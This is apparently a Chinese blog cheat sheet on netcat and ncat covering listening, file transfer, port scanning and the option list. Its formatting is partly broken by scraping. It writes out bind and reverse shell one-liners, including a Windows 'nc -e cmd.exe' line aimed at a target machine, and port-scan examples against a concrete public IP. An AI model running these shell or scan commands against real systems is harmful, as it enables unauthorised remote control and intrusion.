netcat

NC缺乏加密和身份验证的能力

网络工具中的瑞士军刀。
有侦听模式和传输模式
传输文本信息,传输文件
可以远程控制
可以端口扫描

-lp port ``` 监听
1
```   nc -nv ip  port    -q  1
-nvz ip 1-65535 ``` 端口扫描
1
2
3
4
5


远控
正向 ``` nc -lp port -c bash ``` windows换为cmd
``` nc ip port

反向

lp port ```
1
``` nc ip port -c bash

Options:
  • -c shell commands
  • -e, –exec=PROGRAM program to exec after connect
  • -g, –gateway=LIST source-routing hop point[s], up to 8
  • -G, –pointer=NUM source-routing pointer: 4, 8, 12, …
  • -h, –help display this help and exit
  • -i, –interval=SECS delay interval for lines sent, ports scanned
  • -l, –listen listen mode, for inbound connects
  • -L, –tunnel=ADDRESS:PORT forward local port to remote address
  • -n, –dont-resolve numeric-only IP addresses, no DNS
  • -o, –output=FILE output hexdump traffic to FILE (implies -x)
  • -p, –local-port=NUM local port number
  • -r, –randomize randomize local and remote ports
  • -s, –source=ADDRESS local source address (ip or hostname)
  • -t, –tcp TCP mode (default)
  • -T, –telnet answer using TELNET negotiation
  • -u, –udp UDP mode
  • -v, –verbose verbose (use twice to be more verbose)
  • -V, –version output version information and exit
  • -x, –hexdump hexdump incoming and outgoing traffic
  • -w, –wait=SECS timeout for connects and final net reads
  • -z, –zero zero-I/O mode (used for scanning)
实例
  • nc -v -l -p port > D:/sunzn.exe

    • 【解释】在本地运行 nc -v -n ip port < C:/sunzn.exe 意为从本地 C 盘根目录中读取 sunzn.exe 文件的内容,并把这些数据发送到远程主机的对应端口上(注:命令行中的 IP 为接收文件的远程主机 IP ),在远程主机运行 nc -v -l -p port > D:/sunzn.exe 意为监听对应端口并把接收到的信息数据写到 D:/sunzn.exe 中,两行命令实现了文件在本地主机和远程主机间的传输。1、扫描常用命令。 以下IP 处可以使用域名,nc会调用NDS解析成IP地址。
  • nc -v ip port

    • 【例如】nc -v 96.44.174.9 80
    • 【解释】扫瞄某 IP 的某个端口,返回端口信息详细输出。
  • nc -v -z ip port-port

    • 【例如】nc -v -z 96.44.174.9 80-1024
    • 【解释】扫描某IP的端口段,返回端口信息详细输出,但扫描速度很慢。
  • nc -v -z -u ip port-port

    • 【例如】nc -v -z -u 96.44.174.9 25-1024
    • 【解释】扫描某 IP 的某 UDP 端口段,返回端口信息详细输出,但扫描速度很慢。
  • nc -nvv -w2 -z ip port-port

    • 【例如】nc -nvv -w2 -z 96.44.174.9 80-1024
    • 【解释】扫锚某IP的端口段,连接超时时间为2秒。

ncat 包含于nmap工具包中

ncat -c bash –allow ip -vnl port –ssl
ncat -nv ip port –ssl

windows 下

1.进入下载地址下载文件https://eternallybored.org/misc/netcat/
2.将文件夹中的对应可执行文件复制到C:\Windows\System32的文件夹下(有32位版和64位版)
3.直接打开cmd,输入:nc XXXXXX执行就好

Windows下:nc -e cmd.exe -d IP port(靶机)

文章目录
  1. 1. Options:
  2. 2. 实例
  • windows 下
  • ,